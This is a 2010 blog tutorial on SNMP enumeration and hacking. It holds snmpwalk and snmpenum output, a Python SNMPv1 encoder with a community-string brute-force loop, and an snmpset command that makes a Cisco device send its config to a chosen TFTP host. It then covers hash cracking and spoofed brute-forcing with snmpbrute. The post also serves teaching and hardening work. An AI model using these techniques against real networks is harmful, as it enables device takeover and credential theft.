IP

Wednesday, November 24, 2010

SNMP (Simple Network Management Protocol) Enumeration And Hacking


SNMP (Simple Network Management Protocol) 
Simple Network Management Protocol (SNMP) is a TCP/IP standard protocol used for remote monitoring and management of hosts, routers and other devices on a network. SNMP works through a system of managers (management stations) and agents. Gathering information about hosts, routers, devices etc. with the help of SNMP is known as SNMP enumeration. Although SNMP version 3 provides authentication and encryption, the far more widely deployed versions 1 and 2c are clear-text protocols whose only "security" is the community string, effectively a password that is sent in clear text in every packet. The default community strings are "public" (read-only) and "private" (read-write). Default community strings are a gift to an attacker: they usually yield more than enough information to plan an attack, and a read-write string allows changing the device's configuration, as shown later in this post.


This tutorial assumes you know your stuff, but here are a few basic terms:

SNMP - (Simple Network Management Protocol) - an application-layer protocol for managing TCP/IP based networks. SNMP runs over UDP (which runs over IP): agents listen on UDP port 161, and send traps to the manager on UDP port 162. 

MIB - (Management Information Base) - provides a standard representation of the SNMP agent's available information and where it is stored. 

NMS - (Network Management Station) - A device designed to poll SNMP agents for information. 

SNMP Agent - a device running some software that understands the language of SNMP. Almost any network device could potentially run SNMP, but typically you will find SNMP agents running on internetworking devices (e.g. routers, switches, bridges, managed hubs, printers). Most operating systems (UNIX/Linux, Windows NT and later) can also run an SNMP agent. 

The main problem with SNMP is that its authentication method (community strings, all too often left at the defaults "public" and "private") is inherently weak: the string travels in clear text with every request, so it can be sniffed, guessed or brute-forced. On top of that, SNMP runs over UDP, so requests are trivially spoofable; a set operation needs no reply, so an attacker can forge it from whatever source address an access list happens to trust. So we've got a weak protocol, often forgotten and misconfigured - a disaster just waiting to happen. 
Just to get a taste of what kind of info SNMP gives away, we'll use snmpwalk, the command-line walker from the Net-SNMP suite on Linux. (I've found Win32 ports for these tools, but I strongly suggest using Linux for this tutorial.) 

In the first example we will use "public" (the default) community string to enumerate a Windows Machine running SNMP. 

 # snmpwalk -v 1 -c public 192.168.0.222
(General Info: system.sysDescr, plus one tcpConnTable.tcpConnLocalAddress row)
.iso.3.6.1.2.1.1.1.0 = "Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0"
.iso.3.6.1.2.1.6.13.1.2.192.168.0.222.139.0.0.0.0.59542 = IpAddress: 192.168.0.222
(Open Ports: tcpConnTable.tcpConnLocalPort; the row index is local-address.local-port.remote-address.remote-port)
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.59620 = 21
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.25.0.0.0.0.18484 = 25
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.80.0.0.0.0.59465 = 80
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.119.0.0.0.0.51385 = 119
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.135.0.0.0.0.26722 = 135
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.443.0.0.0.0.2272 = 443
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.445.0.0.0.0.43190 = 445
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.563.0.0.0.0.34828 = 563
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1025.0.0.0.0.10361 = 1025
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1026.0.0.0.0.18486 = 1026
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1029.0.0.0.0.18510 = 1029
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.1755.0.0.0.0.10411 = 1755
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3372.0.0.0.0.2224 = 3372
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.59426 = 3389
.iso.3.6.1.2.1.6.13.1.3.192.168.0.222.139.0.0.0.0.59542 = 139
(Drives: hrStorageTable.hrStorageDescr)
.iso.3.6.1.2.1.25.2.3.1.3.1 = "A:"
.iso.3.6.1.2.1.25.2.3.1.3.2 = "C: Label:  Serial Number 28a1a476"
.iso.3.6.1.2.1.25.2.3.1.3.3 = "D: Label:W2KSEL_EN  Serial Number 9ac432a9"
.iso.3.6.1.2.1.25.2.3.1.3.4 = "Virtual Memory"
(Processes: hrSWRunTable.hrSWRunName; the row index is the PID)
.iso.3.6.1.2.1.25.4.2.1.2.1 = "System Idle Process"
.iso.3.6.1.2.1.25.4.2.1.2.8 = "System"
.iso.3.6.1.2.1.25.4.2.1.2.176 = "smss.exe"
.iso.3.6.1.2.1.25.4.2.1.2.200 = "csrss.exe"
.iso.3.6.1.2.1.25.4.2.1.2.224 = "winlogon.exe"
.iso.3.6.1.2.1.25.4.2.1.2.252 = "services.exe"
.iso.3.6.1.2.1.25.4.2.1.2.264 = "lsass.exe"
.iso.3.6.1.2.1.25.4.2.1.2.380 = "termsrv.exe"
.iso.3.6.1.2.1.25.4.2.1.2.500 = "svchost.exe"
.iso.3.6.1.2.1.25.4.2.1.2.532 = "SPOOLSV.EXE"
.iso.3.6.1.2.1.25.4.2.1.2.564 = "msdtc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.668 = "svchost.exe"
.iso.3.6.1.2.1.25.4.2.1.2.692 = "llssrv.exe"
.iso.3.6.1.2.1.25.4.2.1.2.768 = "NSPMON.exe"
.iso.3.6.1.2.1.25.4.2.1.2.796 = "NSCM.exe"
.iso.3.6.1.2.1.25.4.2.1.2.868 = "regsvc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.908 = "mstask.exe"
.iso.3.6.1.2.1.25.4.2.1.2.960 = "VMwareService.e"
.iso.3.6.1.2.1.25.4.2.1.2.992 = "svchost.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1020 = "dfssvc.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1040 = "inetinfo.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1056 = "nspm.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1108 = "NSUM.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1364 = "explorer.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1544 = "VMwareTray.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1572 = "VMwareUser.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1600 = "cmd.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1616 = "mdm.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1660 = "mshta.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1712 = "snmp.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1724 = "snmptrap.exe"
(Installed Apps: hrSWInstalledTable.hrSWInstalledName)
.iso.3.6.1.2.1.25.6.3.1.2.1 = "Sentinel 2.0"
.iso.3.6.1.2.1.25.6.3.1.2.2 = "VMware Tools"
.iso.3.6.1.2.1.25.6.3.1.2.3 = "WebFldrs"
#
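
Here is a small added example (not part of the original post) showing how the labelled sections above are recovered from the raw walk: every OID is a column prefix plus a row index, and for tcpConnTable the index itself encodes the local and remote socket. It runs over a few lines copied from the output above as constructed sample input; the column names are the standard MIB-II and HOST-RESOURCES-MIB ones.

```python
import re

# Constructed sample: a handful of the OID/value pairs from the snmpwalk output above
# (numeric form, as Net-SNMP prints it when no MIB files are loaded).
SAMPLE_WALK = """\
.iso.3.6.1.2.1.1.1.0 = "Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0"
.iso.3.6.1.2.1.6.13.1.2.192.168.0.222.139.0.0.0.0.59542 = IpAddress: 192.168.0.222
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.21.0.0.0.0.59620 = 21
.iso.3.6.1.2.1.6.13.1.3.0.0.0.0.3389.0.0.0.0.59426 = 3389
.iso.3.6.1.2.1.6.13.1.3.192.168.0.222.139.0.0.0.0.59542 = 139
.iso.3.6.1.2.1.25.2.3.1.3.2 = "C: Label:  Serial Number 28a1a476"
.iso.3.6.1.2.1.25.4.2.1.2.264 = "lsass.exe"
.iso.3.6.1.2.1.25.4.2.1.2.1712 = "snmp.exe"
.iso.3.6.1.2.1.25.6.3.1.2.2 = "VMware Tools"
"""

# Standard MIB-II / HOST-RESOURCES-MIB columns that appear in the walk ("iso" is arc 1).
COLUMNS = {
    "1.3.6.1.2.1.1.1": "sysDescr",
    "1.3.6.1.2.1.6.13.1.3": "tcpConnLocalPort",
    "1.3.6.1.2.1.25.2.3.1.3": "hrStorageDescr",
    "1.3.6.1.2.1.25.4.2.1.2": "hrSWRunName",
    "1.3.6.1.2.1.25.6.3.1.2": "hrSWInstalledName",
}


def parse_line(line):
    """Split 'OID = value' into a numeric dotted OID and a bare value string."""
    oid, _, value = line.partition(" = ")
    oid = oid.strip().lstrip(".")
    if oid.startswith("iso"):
        oid = "1" + oid[3:]
    value = value.strip()
    # Net-SNMP prefixes typed values ("IpAddress: 1.2.3.4", "STRING: ..."); drop that tag,
    # but leave quoted strings alone so a value like "Hardware: x86 ..." is not mangled.
    if not value.startswith('"'):
        value = re.sub(r"^[A-Za-z0-9]+:\s*", "", value)
    return oid, value.strip('"')


def classify(oid):
    """Return (column name, row index) if the OID sits under a known column, else (None, None)."""
    for prefix, name in COLUMNS.items():
        if oid.startswith(prefix + "."):
            return name, oid[len(prefix) + 1:]
    return None, None


def decode_tcp_index(index):
    """tcpConnTable rows are indexed by localAddr(4 arcs).localPort.remAddr(4 arcs).remPort."""
    arcs = index.split(".")
    if len(arcs) != 10:
        raise ValueError(f"unexpected tcpConnTable index: {index}")
    return ".".join(arcs[0:4]), int(arcs[4]), ".".join(arcs[5:9]), int(arcs[9])


def summarize_walk(text):
    """Rebuild the hand-made sections above (system, ports, drives, processes, software)."""
    summary = {"system": None, "tcp_listeners": [], "storage": [], "processes": {}, "software": []}
    for line in text.splitlines():
        if " = " not in line:
            continue
        oid, value = parse_line(line)
        column, index = classify(oid)
        if column == "sysDescr":
            summary["system"] = value
        elif column == "tcpConnLocalPort":
            # The walk above only shows the local-port column; a careful scan would also read
            # tcpConnState (...6.13.1.1) and keep only rows whose state is listen(2).
            local, lport, _remote, _rport = decode_tcp_index(index)
            summary["tcp_listeners"].append((local, lport))
        elif column == "hrStorageDescr":
            summary["storage"].append(value)
        elif column == "hrSWRunName":
            summary["processes"][int(index)] = value  # the Windows agent uses the PID as row index
        elif column == "hrSWInstalledName":
            summary["software"].append(value)
    summary["tcp_listeners"].sort(key=lambda entry: entry[1])
    return summary


if __name__ == "__main__":
    for section, content in summarize_walk(SAMPLE_WALK).items():
        print(f"{section}: {content}")
```

Feed it the full output of `snmpwalk -v 1 -c public <host> .1.3.6.1.2.1` (saved to a file) and you get the same sections snmpenum prints, minus the vendor-private ones.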


We see that a simple walk of the standard MIB tree yields a whopping amount of information. By querying vendor-specific private MIBs (the enterprise subtrees under .1.3.6.1.4.1) even more can be found, as Filip Waeytens' tool snmpenum shows. Its config file windows.txt contains the private MIB OIDs for Microsoft hosts (the LAN Manager MIB under .1.3.6.1.4.1.77), which is where the user, share and service lists below come from. 


# perl snmpenum.pl
Usage: perl snmpenum.pl <IP-address> <community> <configfile>
# perl snmpenum.pl 192.168.0.222 public windows.txt 

SERVICES

Server
Alerter
Event Log
Messenger
DNS Client
DHCP Client
Workstation
SNMP Service
Plug and Play
…..
World Wide Web Publishing Service
Distributed Transaction Coordinator
Simple Mail Transport Protocol (SMTP)
Network News Transport Protocol (NNTP)
Windows Management Instrumentation Driver Extensions

DISKS

A:
C: Label:  Serial Number 28a1a476
D: Label:W2KSEL_EN  Serial Number 9ac432a9
Virtual Memory

LISTENING TCP PORTS

21
25
80
119
135
443
445
563
1025
1026
1029
1755
3372
3389

UPTIME

16 minutes, 52.92

LISTENING UDP PORTS

135
161
162
445
1028
1030
1755
3456

USERS

Guest
IUSR_LAB-SP3
IWAM_LAB-SP3
Administrator
TsInternetUser
NetShowServices

DOMAIN

WORKGROUP

SYSTEM INFO

Hardware: x86 Family 6 Model 8 Stepping 0 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)

HOSTNAME

LAB-SP3

RUNNING PROCESSES

System Idle Process
System
smss.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
termsrv.exe
svchost.exe
…
cmd.exe
mdm.exe
mshta.exe
snmp.exe
snmptrap.exe

INSTALLED SOFTWARE

Sentinel 2.0
VMware Tools
WebFldrs

SHARES

MyShare
C:\Documents and Settings\Administrator\Desktop\MyShare


Surprised? SNMP is a powerful enumeration tool. A common misconception, however, is that SNMP is "read only" and that no actual changes can be made through it. This couldn't be further from the truth, as the next example shows. 

SNMP community strings can be brute-forced with a variety of tools (a Perl one was rumoured to be on its way at the time of writing). Here I'm using the SNMP Brute Force tool from the SolarWinds toolset to brute-force the community strings of a router. 
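
To see why community strings are so easy to sniff or guess (the point made at the top of this post) and what any brute-forcer such as the SolarWinds tool does under the hood, here is an added example, not code from the original post or from SolarWinds: a bare-bones SNMPv1 message encoder/decoder with no external dependencies. It builds the GetRequest for sysDescr.0 that a brute-forcer sends once per candidate string, decodes it the way a sniffer would (the community is a plain OCTET STRING in every packet), and checks replies the way a brute-forcer must, since a v1/v2c agent simply ignores a wrong community. Everything follows the RFC 1157 encoding; the example community string and request-id are the only assumed values. The `guess_community` loop is network code and only runs if you point it at a host you are allowed to test; the offline demo constructs both packets locally.

```python
import socket

SNMP_V1 = 0                      # version field: 0 = v1, 1 = v2c
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2
SYS_DESCR = "1.3.6.1.2.1.1.1.0"

# --- BER encoding: only the handful of types an SNMPv1/v2c message needs ---
def tlv(tag, content):
    n = len(content)
    if n < 0x80:
        return bytes([tag, n]) + content
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([tag, 0x80 | len(body)]) + body + content

def ber_int(value):  # two's complement, minimal length, room for the sign bit
    return tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def ber_oid(oid):
    arcs = [int(a) for a in oid.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:                     # base-128, high bit set on all but the last byte
        chunk = [arc & 0x7F]
        while arc > 0x7F:
            arc >>= 7
            chunk.append(0x80 | (arc & 0x7F))
        out.extend(reversed(chunk))
    return tlv(0x06, bytes(out))

def build_message(pdu_type, community, request_id, varbinds, version=SNMP_V1):
    """Message ::= SEQUENCE { version, community OCTET STRING, PDU }. Nothing is encrypted
    or hashed: the community string travels as plain bytes in every packet."""
    vbl = tlv(0x30, b"".join(tlv(0x30, ber_oid(oid) + tlv(tag, val)) for oid, tag, val in varbinds))
    pdu = tlv(pdu_type, ber_int(request_id) + ber_int(0) + ber_int(0) + vbl)  # error-status/index = 0
    return tlv(0x30, ber_int(version) + tlv(0x04, community.encode()) + pdu)

def build_get_request(community, oid, request_id):
    return build_message(GET_REQUEST, community, request_id, [(oid, 0x05, b"")])  # value = NULL

# --- BER decoding: what a sniffer, or a brute-forcer checking replies, has to do ---
def read_tlv(buf, pos):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def ber_to_int(content):
    return int.from_bytes(content, "big", signed=True)

def parse_oid(content):
    arcs, value = [content[0] // 40, content[0] % 40], 0
    for b in content[1:]:
        value = (value << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(value)
            value = 0
    return ".".join(map(str, arcs))

def parse_message(raw):
    tag, msg, _ = read_tlv(raw, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, version, pos = read_tlv(msg, 0)
    _, community, pos = read_tlv(msg, pos)
    pdu_type, pdu, _ = read_tlv(msg, pos)
    _, request_id, pos = read_tlv(pdu, 0)
    _, error_status, pos = read_tlv(pdu, pos)
    _, _error_index, pos = read_tlv(pdu, pos)
    _, vbl, _ = read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = read_tlv(vbl, pos)
        _, oid, inner = read_tlv(vb, 0)
        value_tag, value, _ = read_tlv(vb, inner)
        varbinds.append((parse_oid(oid), value_tag, value))
    return {"version": ber_to_int(version), "community": community.decode("latin-1"),
            "pdu_type": pdu_type, "request_id": ber_to_int(request_id),
            "error_status": ber_to_int(error_status), "varbinds": varbinds}

def community_accepted(reply, request_id):
    """A correct community gets a GetResponse echoing our request-id; a wrong one gets silence
    (and at most an authenticationFailure trap to the configured trap host), never an error."""
    try:
        msg = parse_message(reply)
    except (IndexError, ValueError):
        return False
    return msg["pdu_type"] == GET_RESPONSE and msg["request_id"] == request_id

def guess_community(host, candidates, port=161, timeout=0.5):
    """Brute-force loop (network code, not exercised offline): one GetRequest per candidate."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    for request_id, community in enumerate(candidates, start=1):
        sock.sendto(build_get_request(community, SYS_DESCR, request_id), (host, port))
        try:
            reply, _ = sock.recvfrom(4096)
        except socket.timeout:
            continue
        if community_accepted(reply, request_id):
            return community
    return None

if __name__ == "__main__":
    packet = build_get_request("public", SYS_DESCR, 0x1234)
    print(packet.hex())  # 7075626c6963 ("public") sits in the clear between the version and the PDU
    print(parse_message(packet)["community"])  # exactly what a sniffer on the path recovers
```

Two things the code makes obvious that the tools hide: the only "credential" is six plain bytes anyone on the path can read, and because a wrong guess produces no reply at all, a brute-forcer's speed is bounded purely by how many UDP datagrams it is willing to send before giving up on each one, which is why wordlist attacks against UDP/161 are so fast.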

Once the read/write community string is found, we can use snmpset to make the device hand us its configuration. The OID .1.3.6.1.4.1.9.2.1.55 (writeNet in Cisco's OLD-CISCO-SYS-MIB) tells an IOS device to copy its running configuration via TFTP to the IP address appended to the OID, into the filename given as the value. The router itself does the upload; all we need is a TFTP server listening on the address we name (most TFTP daemons have to be explicitly allowed to create new files, otherwise an empty, writable file of that name must exist first). Notice the syntax: 

snmpset -v 1 -c <RW community> <router hostname/IP> .1.3.6.1.4.1.9.2.1.55.<TFTP IP octet1>.<octet 2>.<octet 3>.<octet 4> s <path/file on the TFTP server to save the config to> 


# snmpset -v 1 -c password 192.168.1.254 .1.3.6.1.4.1.9.2.1.55.192.168.1.232 s conf
SNMPv2-SMI::enterprises.9.2.1.55.192.168.1.232 = STRING: "conf"
# cat conf
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1
…….
interface FastEthernet0/24
!
ip default-gateway 192.168.1.138
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
login
!
end
#


We have downloaded the config file with all the configuration parameters of the router (well, it's a switch, but same-same). The SNMP community strings and the vty passwords are in clear text (note "no service password-encryption"). The enable password, however, is stored as an "enable secret 5" value, which is a salted MD5-crypt hash (the $1$ prefix) rather than encryption: it cannot be read back, but it can be cracked. We'll use John the Ripper to brute-force it. Copy the hash into a text file, one entry per line in the user:hash form of a Unix shadow file, with everything from $1$ onwards as the hash. 

Once this is done, we run john on the file and wait for the password to be found. 

We have now found the enable password too. We can log in with "muts" as the vty password and then escalate with "mutz" as the enable password. 

A nice brute-forcer, spoofer and automatic config downloader called snmpbrute (found on Packet Storm) builds on the same writeNet trick: it works through the wordlist (-w) and, as soon as the correct read-write community is hit, the router copies its config to the TFTP server given with -t. Because a set needs no reply, the source address (-s) can be spoofed to anything an access list happens to trust; here it is spoofed as the switch itself: 


# snmpbrute -s 192.168.1.254 -d 192.168.1.254 -w word.txt -m 2 -t 192.168.1.232
Ok, spoofing packets from 192.168.1.254 to 192.168.1.254 with wordlist word.txt 
(Delay: 200)
TFTP Address:192.168.1.232
Size is 39
Read 6 words/lines
Address of tftp server is 192.168.1.232
# cat running-config
!
version 12.0
no service pad
service timestamps debug uptime
service timestamps log uptime
no service password-encryption
!
hostname Muts
!
enable secret 5 $1$w1lV$bRSsthY/jKg1SEooEyki3/
!
ip subnet-zero
!
interface FastEthernet0/1
…
interface FastEthernet0/24
!
interface VLAN1
ip address 192.168.1.254 255.255.255.0
no ip directed-broadcast
no ip route-cache
!
ip default-gateway 192.168.1.138
snmp-server engineID local 0000000902000003E3645800
snmp-server community password RW
snmp-server community test RO
!
line con 0
transport input none
stopbits 1
line vty 0 4
password muts
login
line vty 5 15
password muts
login
!
end
#


IMHO, SolarWinds has the most complete set of SNMP security and testing tools, and the rest of the toolset is well worth exploring. 

Summary and Conclusion 
SNMP is rarely audited and can pose a significant threat if left misconfigured, so treat it as a "high risk" protocol. If you have to use it: replace the default community strings with long random ones, use read-only communities wherever possible (a read-write string is equivalent to full administrative access, as the config download above shows), bind every community to an access list that permits only your management stations, and never expose UDP/161 to untrusted networks. If you have the option, use SNMPv3 with authentication and privacy (authPriv) instead of v1/v2c. 

Most importantly…..Get to know your SNMP!

SNMP is a protocol that never seems to get the attention it deserves. 
Read in detail: http://www.chapo.co.il/articles/snmp/ 
http://net-snmp.sourceforge.net/ 
http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm 

1 comment:

  1. You need to accomplish it all quickly and cost-effectively. Network management is important to companies because businesses rely heavily on the network to perform communications and process-related tasks.